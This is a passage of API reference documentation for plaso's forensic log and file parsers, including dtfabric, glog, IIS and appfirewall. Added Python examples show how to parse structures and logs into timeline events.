A dtFabric-based data format parser defines its data format structures in a dtFabric definition file, for example “dtfabric.yaml”:
    name: int32
    type: integer
    description: 32-bit signed integer type
    attributes:
      format: signed
      size: 4
      units: bytes
    ---
    name: point3d
    aliases: [POINT]
    type: structure
    description: Point in 3 dimensional space.
    attributes:
      byte_order: little-endian
    members:
    - name: x
      aliases: [XCOORD]
      data_type: int32
    - name: y
      data_type: int32
    - name: z
      data_type: int32
The path to the definition file is defined in the class constant “_DEFINITION_FILE” and will be read on class instantiation.
The definition file contains data type definitions such as “int32” and “point3d” in the previous example.
A data type map can be used to create a Python object that represents the data type definition mapped to a byte stream, for example if we have the following byte stream: 01 00 00 00 02 00 00 00 03 00 00 00
The corresponding “point3d” Python object would be: point3d(x=1, y=2, z=3)
A parser that wants to implement a dtFabric-based data format parser needs to:
• define a definition file and override _DEFINITION_FILE;
• implement the ParseFileObject method.
The _GetDataTypeMap method of this class can be used to retrieve data type maps from the “fabric”, which is the collection of the data type definitions in the definition file. Data type maps are cached for reuse.
The _ReadStructure method of this class can be used to read structure data from a file-like object and create a Python object using a data type map.
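To make the data type map idea concrete, here is an added example that is not dtfabric and not plaso's DtFabricBaseParser: a minimal stand-in that takes the “point3d” definition above (expressed as a Python dict rather than YAML), builds a struct layout from the member types and byte order, caches the map as the text says _GetDataTypeMap does, and reads one structure from a file-like object the way _ReadStructure is described, including the truncated-file case. The names DataTypeMap, GetDataTypeMap, ReadStructure and POINT3D_DEFINITION are assumptions for this illustration; only the int32 basic type is defined.

```python
import io
import struct
from collections import namedtuple

# Constructed stand-in for the "fabric" of basic types: name -> (struct code, size in bytes).
# Only int32 is defined, mirroring the int32 definition in the dtfabric.yaml above.
_BASIC_TYPES = {"int32": ("i", 4)}

# Constructed definition mirroring the "point3d" structure in the dtfabric.yaml above.
POINT3D_DEFINITION = {
    "name": "point3d",
    "byte_order": "little-endian",
    "members": [
        {"name": "x", "data_type": "int32"},
        {"name": "y", "data_type": "int32"},
        {"name": "z", "data_type": "int32"},
    ],
}


class DataTypeMap:
    """Maps a structure definition onto a byte stream (hypothetical helper, not dtfabric)."""

    def __init__(self, definition):
        prefix = "<" if definition["byte_order"] == "little-endian" else ">"
        codes = [_BASIC_TYPES[member["data_type"]][0] for member in definition["members"]]
        self._struct = struct.Struct(prefix + "".join(codes))
        self._tuple_class = namedtuple(
            definition["name"], [member["name"] for member in definition["members"]])

    def GetByteSize(self):
        """Returns the number of bytes one structure occupies."""
        return self._struct.size

    def MapByteStream(self, byte_stream):
        """Creates the Python object for the structure at the start of byte_stream."""
        if len(byte_stream) < self._struct.size:
            raise ValueError(
                "byte stream of {0:d} bytes is too small for {1:s} ({2:d} bytes)".format(
                    len(byte_stream), self._tuple_class.__name__, self._struct.size))
        return self._tuple_class(*self._struct.unpack_from(byte_stream))


# Data type maps are cached for reuse, as the text says _GetDataTypeMap does.
_DATA_TYPE_MAP_CACHE = {}


def GetDataTypeMap(definition):
    """Retrieves the data type map for a definition, building it on first use."""
    name = definition["name"]
    if name not in _DATA_TYPE_MAP_CACHE:
        _DATA_TYPE_MAP_CACHE[name] = DataTypeMap(definition)
    return _DATA_TYPE_MAP_CACHE[name]


def ReadStructure(file_object, file_offset, data_type_map):
    """Reads one structure from a file-like object at file_offset.

    Raises ValueError when the file ends before a complete structure was read;
    a parser would report this as UnableToParseFile rather than guess at values.
    """
    file_object.seek(file_offset, io.SEEK_SET)
    data = file_object.read(data_type_map.GetByteSize())
    if len(data) != data_type_map.GetByteSize():
        raise ValueError(
            "unable to read structure at offset 0x{0:08x}: file truncated".format(file_offset))
    return data_type_map.MapByteStream(data)


if __name__ == "__main__":
    # The byte stream from the text: 01 00 00 00 02 00 00 00 03 00 00 00
    stream = io.BytesIO(bytes.fromhex("01 00 00 00 02 00 00 00 03 00 00 00"))
    print(ReadStructure(stream, 0, GetDataTypeMap(POINT3D_DEFINITION)))
```

Running the block prints point3d(x=1, y=2, z=3), the object the text describes. The size check in MapByteStream is the part worth copying: mapping a definition onto fewer bytes than it needs must fail loudly, because forensic input is routinely truncated or carved.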
abstract ParseFileObject(parser_mediator, file_object)
Parses a file-like object.
Parameters
• parser_mediator (ParserMediator) – a parser mediator.
• file_object (dfvfs.FileIO) – a file-like object to parse.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.esedb module
Parser for Extensible Storage Engine (ESE) database files (EDB).
class plaso.parsers.esedb.ESEDBCache
Bases: plaso.parsers.plugins.BasePluginCache
A cache storing query results for ESEDB plugins.
StoreDictInCache(attribute_name, dict_object)
Store a dict object in cache.
Parameters
• attribute_name (str) – name of the attribute.
• dict_object (dict) – dictionary.
class plaso.parsers.esedb.ESEDBParser
Bases: plaso.parsers.interface.FileObjectParser
Parses Extensible Storage Engine (ESE) database files (EDB).
DATA_FORMAT = 'Extensible Storage Engine (ESE) Database File (EDB) format'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'esedb'
ParseFileObject(parser_mediator, file_object)
Parses an ESE database file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – file-like object.
plaso.parsers.filestat module
File system stat object parser.
class plaso.parsers.filestat.FileStatEventData
Bases: plaso.containers.events.EventData
File system stat event data.
display_name: display name.
Type str
file_entry_type: dfVFS file entry type.
Type int
file_size: file size in bytes.
Type int
file_system_type: file system type.
Type str
filename: name of the file.
Type str
inode: inode of the file.
Type int
is_allocated: True if the file is allocated.
Type bool
DATA_TYPE = 'fs:stat'
class plaso.parsers.filestat.FileStatParser
Bases: plaso.parsers.interface.FileEntryParser
Parses file system stat object.
DATA_FORMAT = 'file system stat information'
NAME = 'filestat'
ParseFileEntry(parser_mediator, file_entry)
Parses a file entry.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_entry (dfvfs.FileEntry) – a file entry.
plaso.parsers.firefox_cache module
Implements a parser for Firefox cache 1 and 2 files.
class plaso.parsers.firefox_cache.BaseFirefoxCacheParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parses Firefox cache files.
class plaso.parsers.firefox_cache.FirefoxCache2Parser
Bases: plaso.parsers.firefox_cache.BaseFirefoxCacheParser
Parses Firefox cache version 2 files (Firefox 32 or later).
DATA_FORMAT = 'Mozilla Firefox Cache version 2 file (version 32 or later)'
NAME = 'firefox_cache2'
ParseFileObject(parser_mediator, file_object)
Parses a Firefox cache file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
class plaso.parsers.firefox_cache.FirefoxCacheEventData
Bases: plaso.containers.events.EventData
Firefox cache event data.
data_size: size of the cached data.
Type int
fetch_count: number of times the cache entry was fetched.
Type int
frequency: ???
Type int
info_size: size of the metadata.
Type int
location: ???
Type str
request_method: HTTP request method.
Type str
request_size: HTTP request byte size.
Type int
response_code: HTTP response code.
Type int
url: URL of original content.
Type str
version: cache format version.
Type int
DATA_TYPE = 'firefox:cache:record'
class plaso.parsers.firefox_cache.FirefoxCacheParser
Bases: plaso.parsers.firefox_cache.BaseFirefoxCacheParser
Parses Firefox cache version 1 files (Firefox 31 or earlier).
DATA_FORMAT = 'Mozilla Firefox Cache version 1 file (version 31 or earlier)'
FIREFOX_CACHE_CONFIG: alias of firefox_cache_config
NAME = 'firefox_cache'
ParseFileObject(parser_mediator, file_object)
Parses a Firefox cache file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.fseventsd module
Parsers for MacOS fseventsd files.
class plaso.parsers.fseventsd.FseventsdEventData
Bases: plaso.containers.events.EventData
MacOS file system event (fseventsd) event data.
event_identifier: the record event identifier.
Type int
flags: flags stored in the record.
Type int
node_identifier: file system node identifier related to the file system event.
Type int
path: path recorded in the fseventsd record.
Type str
DATA_TYPE = 'macos:fseventsd:record'
class plaso.parsers.fseventsd.FseventsdParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parser for fseventsd files.
This parser supports both version 1 and version 2 fseventsd files. Refer to http://nicoleibrahim.com/apple-fsevents-forensics/ for details.
DATA_FORMAT = 'MacOS File System Events Disk Log Stream (fseventsd) file'
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns format specification.
Return type FormatSpecification
NAME = 'fseventsd'
ParseFileObject(parser_mediator, file_object)
Parses an fseventsd file.
Parameters
• parser_mediator (ParserMediator) – parser mediator.
• file_object (dfvfs.FileIO) – a file-like object.
Raises UnableToParseFile – when the header cannot be parsed.
plaso.parsers.gdrive_synclog module
Parser for Google Drive Sync log files.
class plaso.parsers.gdrive_synclog.GoogleDriveSyncLogEventData
Bases: plaso.containers.events.EventData
Google Drive Sync log event data.
log_level: logging level of event such as “DEBUG”, “WARN”, “INFO”, “ERROR”.
Type str
message: log message.
Type str
pid: process identifier of process which logged event.
Type int
source_code: filename:line_number of source file which logged event.
Type str
thread: colon-separated thread identifier in the form “ID:name” which logged event.
Type str
DATA_TYPE = 'gdrive_sync:log:line'
class plaso.parsers.gdrive_synclog.GoogleDriveSyncLogParser
Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser
Parses events from Google Drive Sync log files.
BUFFER_SIZE = 16384
DATA_FORMAT = 'Google Drive Sync log file'
LINE_STRUCTURES = [('logline', {{{{{{Group:({{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}} W:(0123...)}) W:(ABCD...)} W:(0123...)} W:(0123...)} W:(0123...)} SkipTo:({StringEnd | Group:({{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(W:(.,))} W:(0123...)}} W:(0123...)})})} [lineEnd]...})]
NAME = 'gdrive_synclog'
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – identifier of the structure of tokens.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, lines)
Verify that this file is a Google Drive Sync log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• lines (str) – one or more lines from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
plaso.parsers.google_logging module
Parser for Google-formatted log files.
class plaso.parsers.google_logging.GoogleLogEventData(data_type='googlelog:log')
Bases: plaso.containers.events.EventData
Google-formatted log file event data.
See: https://github.com/google/glog. This format is also used by Kubernetes, see https://github.com/kubernetes/klog
file_name: the name of the source file that logged the message.
Type str
line_number: the line number in the source file where the logging statement is.
Type int
message: the log message.
Type str
priority: the priority of the message - I, W, E or F. These values represent messages logged at INFO, WARNING, ERROR or FATAL severities, respectively.
Type str
thread_identifier: the identifier of the thread that recorded the message.
Type int
DATA_TYPE = 'googlelog:log'
class plaso.parsers.google_logging.GoogleLogParser
Bases: plaso.parsers.text_parser.PyparsingMultiLineTextParser
Parser for Google-formatted log files.
DATA_FORMAT = 'Google-formatted log file'
LINE_STRUCTURES = [('log_entry', {{{{{{{{I | W | E | F {{{{{{{W:(0123...) W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} [{Suppress:(".") W:(0123...)}]}} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:("] ")} Re:('.*?(?=($|\n[IWEF][0-9]{4}))')} lineEnd}), ('greeting_start', "Log file created at: "), ('greeting', {{{{{{{{{{{W:(0123...) Suppress:("/")} W:(0123...)} Suppress:("/")} W:(0123...)} W:(0123...)} Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)} Re:('.*?(?=($|\n[IWEF][0-9]{4}))')} lineEnd})]
NAME = 'googlelog'
ParseRecord(parser_mediator, key, structure)
Parses a matching entry.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – elements parsed from the file.
Raises ParseError – when the structure type is unknown.
VerifyStructure(parser_mediator, lines)
Verifies that this is a google log-formatted file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• lines (str) – one or more lines from the text file.
Returns True if this is the correct parser, False otherwise.
Return type bool
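The LINE_STRUCTURES above encode two facts about glog output that matter when building a timeline from it: a log line carries a priority letter (I, W, E, F), month and day, time and thread identifier but no year, which is only present in the “Log file created at:” greeting; and a message runs until the next line that starts with a priority letter and four digits, so multi-line messages must be joined. The following is an added example, not plaso's GoogleLogParser: a regex-based parser that applies both rules and produces the same fields as GoogleLogEventData (priority, thread_identifier, file_name, line_number, message). The function name ParseGoogleLog, the default_year parameter and the sample log lines are constructed for this illustration.

```python
import datetime
import re

# Priority letter of a glog line -> severity name.
_PRIORITIES = {'I': 'INFO', 'W': 'WARNING', 'E': 'ERROR', 'F': 'FATAL'}

# Layout of a glog line: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg
_LOG_LINE_RE = re.compile(
    r'^(?P<priority>[IWEF])(?P<month>\d{2})(?P<day>\d{2}) '
    r'(?P<hour>\d{2}):(?P<minute>\d{2}):(?P<second>\d{2})'
    r'(?:\.(?P<fraction>\d+))? +(?P<thread>\d+) '
    r'(?P<file_name>[^:\]]+):(?P<line_number>\d+)\] (?P<message>.*)$')

# "Log file created at: YYYY/MM/DD hh:mm:ss", the only place the year appears.
_GREETING_RE = re.compile(
    r'^Log file created at: (?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{2}) '
    r'(?P<hour>\d{2}):(?P<minute>\d{2}):(?P<second>\d{2})')


def ParseGoogleLog(text, default_year=None):
    """Parses glog-formatted text into a list of entry dicts.

    The year comes from the greeting; default_year is used only when no greeting
    precedes the first log line (for example a rotated file whose head is gone),
    and without either the function refuses to guess. Lines that do not start a
    new entry are continuation lines and are appended to the previous message.
    """
    year = default_year
    entries = []
    current = None
    for line in text.splitlines():
        greeting = _GREETING_RE.match(line)
        if greeting:
            year = int(greeting.group('year'))
            continue
        match = _LOG_LINE_RE.match(line)
        if not match:
            if current is not None:
                current['message'] += '\n' + line
            continue  # header lines before the first entry carry no event
        if year is None:
            raise ValueError(
                'log line seen before a "Log file created at:" greeting and no default_year given')
        # glog writes six fractional digits; tolerate fewer or more.
        fraction = (match.group('fraction') or '0').ljust(6, '0')[:6]
        current = {
            'timestamp': datetime.datetime(
                year, int(match.group('month')), int(match.group('day')),
                int(match.group('hour')), int(match.group('minute')),
                int(match.group('second')), int(fraction)),
            'priority': _PRIORITIES[match.group('priority')],
            'thread_identifier': int(match.group('thread')),
            'file_name': match.group('file_name'),
            'line_number': int(match.group('line_number')),
            'message': match.group('message'),
        }
        entries.append(current)
    return entries


# Constructed sample in glog layout, including a two-line warning message.
SAMPLE_GOOGLE_LOG = '\n'.join([
    'Log file created at: 2020/09/26 14:33:10',
    'Running on machine: build-host',
    'Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg',
    'I0926 14:33:11.000123  1234 main.cc:42] service started',
    'W0926 14:33:12.500000  1234 auth.cc:17] login failed for user',
    '  retrying with cached credentials',
    'E0926 14:33:13.000000  5678 db.cc:9] connection lost',
])

if __name__ == '__main__':
    for entry in ParseGoogleLog(SAMPLE_GOOGLE_LOG):
        print(entry['timestamp'].isoformat(), entry['priority'], entry['message'])
```

The year handling is the caveat to remember when these logs come from a Kubernetes node: a file that has been truncated or rotated past its greeting has no year at all, and a parser that silently fills one in will place the events in the wrong year of the timeline.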
plaso.parsers.iis module
Parser for Windows IIS Log file.
More documentation on fields can be found here: https://msdn.microsoft.com/en-us/library/ms525807(v=vs.90).aspx
class plaso.parsers.iis.IISEventData
Bases: plaso.containers.events.EventData
IIS log event data.
Attributes:
DATA_TYPE = 'iis:log:line'
class plaso.parsers.iis.WinIISParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parses a Microsoft IIS log file.
BLANK = "-"
COMMENT = {"#" {{{"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}} | {"Fields:" SkipTo:(LineEnd)}} | SkipTo:(LineEnd)}}
DATA_FORMAT = 'Microsoft IIS log file'
DATE_METADATA = {"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}}
DATE_TIME = {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}
FIELDS_METADATA = {"Fields:" SkipTo:(LineEnd)}
INTEGER = {W:(0123...) | "-"}
IP_ADDRESS = {{IPv4 address | IPv6 address} | "-"}
LINE_STRUCTURES = [('comment', {"#" {{{"Date:" {{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}} | {"Fields:" SkipTo:(LineEnd)}} | SkipTo:(LineEnd)}}), ('logline', {{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}})]
LOG_LINE_6_0 = {{{{{{{{{{{{{{{{{W:(0123...) Suppress:("-")} W:(0123...)} Suppress:("-")} W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(ABCD...) | "-"}} {{IPv4 address | IPv6 address} | "-"}} {W:(ABCD...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}} {W:(0123...) | "-"}}
NAME = 'winiis'
PORT = {W:(0123...) | "-"}
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – name of the parsed structure.
• structure (pyparsing.ParseResults) – structure parsed from the log file.
Raises ParseError – when the structure type is unknown.
QUERY = {W:(ABCD...) | "-"}
URI = {W:(ABCD...) | "-"}
VerifyStructure(parser_mediator, line)
Verify that this file is an IIS log file.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• line (str) – line from a text file.
Returns True if the line was successfully parsed.
Return type bool
WORD = {W:(ABCD...) | "-"}
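The WinIISParser above recognises comment lines (the “#Date:” and “#Fields:” directives, COMMENT and FIELDS_METADATA) and a fixed IIS 6.0 log line layout in which an empty field is written as “-” (BLANK). The following is an added example, not plaso's IIS parser: a W3C extended format reader that takes the column layout from the “#Fields:” directive instead of a fixed layout, treats “-” as an empty value, converts the numeric columns, and reports lines whose field count does not match rather than guessing. The names ParseIISLog and CountStatusByClient, the _INTEGER_FIELDS set and the sample log are constructed for this illustration.

```python
import datetime

BLANK = '-'  # IIS writes "-" for an empty field

# Columns that carry integers when present; everything else stays a string.
_INTEGER_FIELDS = frozenset([
    's-port', 'sc-status', 'sc-substatus', 'sc-win32-status', 'time-taken',
    'sc-bytes', 'cs-bytes'])


def _ConvertFields(fields, values):
    """Builds an entry dict from one log line; raises ValueError on a non-integer
    value in an integer column."""
    entry = {}
    for name, value in zip(fields, values):
        if value == BLANK:
            entry[name] = None
        elif name in _INTEGER_FIELDS:
            entry[name] = int(value)
        else:
            entry[name] = value
    return entry


def ParseIISLog(text):
    """Parses W3C extended format IIS log text and returns (entries, warnings).

    The column layout is taken from the most recent "#Fields:" directive, so a
    log whose field selection changes mid-file (IIS writes a fresh directive
    block after a restart or a logging configuration change) is read with the
    right columns for each section. Lines that do not fit the current layout are
    reported in warnings and not turned into entries.
    """
    fields = None
    entries = []
    warnings = []
    for line_number, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        if line.startswith('#'):
            if line.startswith('#Fields:'):
                fields = line[len('#Fields:'):].split()
            continue  # #Software, #Version and #Date carry no events
        if fields is None:
            warnings.append('line {0:d}: log line before any #Fields: directive'.format(line_number))
            continue
        values = line.split(' ')
        if len(values) != len(fields):
            warnings.append('line {0:d}: expected {1:d} fields, found {2:d}'.format(
                line_number, len(fields), len(values)))
            continue
        try:
            entry = _ConvertFields(fields, values)
        except ValueError as exception:
            warnings.append('line {0:d}: {1!s}'.format(line_number, exception))
            continue
        # IIS writes W3C format logs in UTC unless configured to use local time.
        if entry.get('date') and entry.get('time'):
            entry['timestamp'] = datetime.datetime.strptime(
                entry['date'] + ' ' + entry['time'], '%Y-%m-%d %H:%M:%S').replace(
                    tzinfo=datetime.timezone.utc)
        entry['line_number'] = line_number
        entries.append(entry)
    return entries, warnings


def CountStatusByClient(entries):
    """Counts responses per (client IP, HTTP status), a quick triage view of
    which clients are generating which response codes."""
    counts = {}
    for entry in entries:
        key = (entry.get('c-ip'), entry.get('sc-status'))
        counts[key] = counts.get(key, 0) + 1
    return counts


# Constructed sample: a directive block, three requests and one damaged line.
SAMPLE_IIS_LOG = '\n'.join([
    '#Software: Microsoft Internet Information Services 7.5',
    '#Version: 1.0',
    '#Date: 2020-10-07 12:00:00',
    '#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username '
    'c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken',
    '2020-10-07 12:00:01 10.0.0.5 GET /index.html - 80 - 192.0.2.10 Mozilla/5.0 200 0 0 15',
    '2020-10-07 12:00:02 10.0.0.5 GET /login.aspx - 443 - 192.0.2.10 Mozilla/5.0 302 0 0 40',
    '2020-10-07 12:00:03 10.0.0.5 GET /admin/ - 443 admin 192.0.2.10 curl/7.68.0 404 0 2 3',
    '2020-10-07 12:00:04 10.0.0.5 GET',
])

if __name__ == '__main__':
    parsed, problems = ParseIISLog(SAMPLE_IIS_LOG)
    for entry in parsed:
        print(entry['timestamp'].isoformat(), entry['c-ip'], entry['cs-uri-stem'], entry['sc-status'])
    print(problems)
```

Two details are easy to get wrong when IIS logs are fed into a timeline: the “-” placeholder must become an empty value rather than the string “-” (otherwise a missing username or query string looks like data), and the timestamps are UTC by default, so they must not be shifted by the analysis machine's local zone.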
plaso.parsers.interface module
The parsers and plugins interface classes.
class plaso.parsers.interface.BaseFileEntryFilter
Bases: object
File entry filter interface.
abstract Match(file_entry)
Determines if a file entry matches the filter.
Parameters file_entry (dfvfs.FileEntry) – a file entry.
Returns True if the file entry matches the filter.
Return type bool
class plaso.parsers.interface.BaseParser
Bases: object
The parser interface.
DATA_FORMAT = ''
classmethod DeregisterPlugin(plugin_class)
Deregisters a plugin class.
The plugin classes are identified based on their lower case name.
Parameters plugin_class (type) – class of the plugin.
Raises KeyError – if plugin class is not set for the corresponding name.
EnablePlugins(plugin_includes)
Enables parser plugins.
Parameters plugin_includes (list[str]) – names of the plugins to enable, where None or an empty list represents all plugins. Note the default plugin, if it exists, is always enabled and cannot be disabled.
FILTERS = frozenset({})
classmethod GetFormatSpecification()
Retrieves the format specification.
Returns a format specification or None if not available.
Return type FormatSpecification
classmethod GetPluginObjectByName(plugin_name)
Retrieves a specific plugin object by its name.
Parameters plugin_name (str) – name of the plugin.
Returns a plugin object or None if not available.
Return type BasePlugin
classmethod GetPlugins()
Retrieves the registered plugins.
Yields tuple[str, type] – name and class of the plugin.
NAME = 'base_parser'
classmethod RegisterPlugin(plugin_class)
Registers a plugin class.
The plugin classes are identified based on their lower case name.
Parameters plugin_class (type) – class of the plugin.
Raises KeyError – if plugin class is already set for the corresponding name.
classmethod RegisterPlugins(plugin_classes)
Registers plugin classes.
Parameters plugin_classes (list[type]) – classes of plugins.
Raises KeyError – if plugin class is already set for the corresponding name.
classmethod SupportsPlugins()
Determines if a parser supports plugins.
Returns True if the parser supports plugins.
Return type bool
class plaso.parsers.interface.FileEntryParser
Bases: plaso.parsers.interface.BaseParser
The file entry parser interface.
Parse(parser_mediator)
Parses the file entry and extracts event objects.
Parameters parser_mediator (ParserMediator) – a parser mediator.
Raises UnableToParseFile – when the file cannot be parsed.
abstract ParseFileEntry(parser_mediator, file_entry)
Parses a file entry.
Parameters
• parser_mediator (ParserMediator) – a parser mediator.
• file_entry (dfvfs.FileEntry) – a file entry to parse.
Raises UnableToParseFile – when the file cannot be parsed.
class plaso.parsers.interface.FileNameFileEntryFilter(filename)
Bases: plaso.parsers.interface.BaseFileEntryFilter
File name file entry filter.
Match(file_entry)
Determines if a file entry matches the filter.
Parameters file_entry (dfvfs.FileEntry) – a file entry.
Returns True if the file entry matches the filter.
Return type bool
class plaso.parsers.interface.FileObjectParser
Bases: plaso.parsers.interface.BaseParser
The file-like object parser interface.
Parse(parser_mediator, file_object)
Parses a single file-like object.
Parameters
• parser_mediator (ParserMediator) – a parser mediator.
• file_object (dfvfs.FileIO) – a file-like object to parse.
Raises UnableToParseFile – when the file cannot be parsed.
abstract ParseFileObject(parser_mediator, file_object)
Parses a file-like object.
Parameters
• parser_mediator (ParserMediator) – a parser mediator.
• file_object (dfvfs.FileIO) – a file-like object to parse.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.java_idx module
Parser for Java Cache IDX files.
class plaso.parsers.java_idx.JavaIDXEventData
Bases: plaso.containers.events.EventData
Java IDX cache file event data.
idx_version: format version of IDX file.
Type str
ip_address: IP address of the host in the URL.
Type str
url: URL of the downloaded file.
Type str
DATA_TYPE = 'java:download:idx'
class plaso.parsers.java_idx.JavaIDXParser
Bases: plaso.parsers.dtfabric_parser.DtFabricBaseParser
Parser for Java WebStart Cache IDX files.
There are five structures defined. 6.02 files had one generic section that retained all data. From 6.03, the file went to a multi-section format where later sections were optional and had variable lengths. 6.03, 6.04, and 6.05 files all have their main data section (#2) begin at offset 128. The short structure is because 6.05 files deviate after the 8th byte. So, grab the first 8 bytes to ensure it’s valid, get the file version, then continue on with the correct structures.
DATA_FORMAT = 'Java WebStart Cache IDX file'
NAME = 'java_idx'
ParseFileObject(parser_mediator, file_object)
Parses a Java WebStart Cache IDX file-like object.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• file_object (dfvfs.FileIO) – a file-like object to parse.
Raises UnableToParseFile – when the file cannot be parsed.
plaso.parsers.logger module
The parsers sub module logger.
plaso.parsers.mac_appfirewall module
Parser for MacOS Application firewall log (appfirewall.log) files.
class plaso.parsers.mac_appfirewall.MacAppFirewallLogEventData
Bases: plaso.containers.events.EventData
MacOS Application firewall log (appfirewall.log) file event data.
action: action.
Type str
agent: agent that saved the log.
Type str
computer_name: name of the computer.
Type str
process_name: name of the entity that tried to do the action.
Type str
status: saved status action.
Type str
DATA_TYPE = 'mac:appfirewall:line'
class plaso.parsers.mac_appfirewall.MacAppFirewallParser
Bases: plaso.parsers.text_parser.PyparsingSingleLineTextParser
Parser for MacOS Application firewall log (appfirewall.log) files.
DATA_FORMAT = 'MacOS Application firewall log (appfirewall.log) file'
DATE_TIME = Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}})
FIREWALL_LINE = {{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) W:(0123...)} W:(0123...)} Suppress:("<")} !W:(>)} Suppress:(">:")} !W:(:)} ":"} SkipTo:(lineEnd)}
LINE_STRUCTURES = [('logline', {{{{{{{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) W:(0123...)} W:(0123...)} Suppress:("<")} !W:(>)} Suppress:(">:")} !W:(:)} ":"} SkipTo:(lineEnd)}), ('repeated', {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("---")} !W:(---)} Suppress:("---")})]
NAME = 'mac_appfirewall_log'
ParseRecord(parser_mediator, key, structure)
Parses a log record structure and produces events.
Parameters
• parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
• key (str) – identifier of the structure of tokens.
• structure (pyparsing.ParseResults) – structure of tokens derived from a line of a text file.
Raises ParseError – when the structure type is unknown.
REPEATED_LINE = {{{Group:({{W:(ABCD...) W:(0123...)} {{{{W:(0123...) Suppress:(":")} W:(0123...)} Suppress:(":")} W:(0123...)}}) Suppress:("---")} !W:(---)} Suppress:("---")}
VerifyStructure(parser_mediator, line)
Verify that this file is a Mac AppFirewall log file.
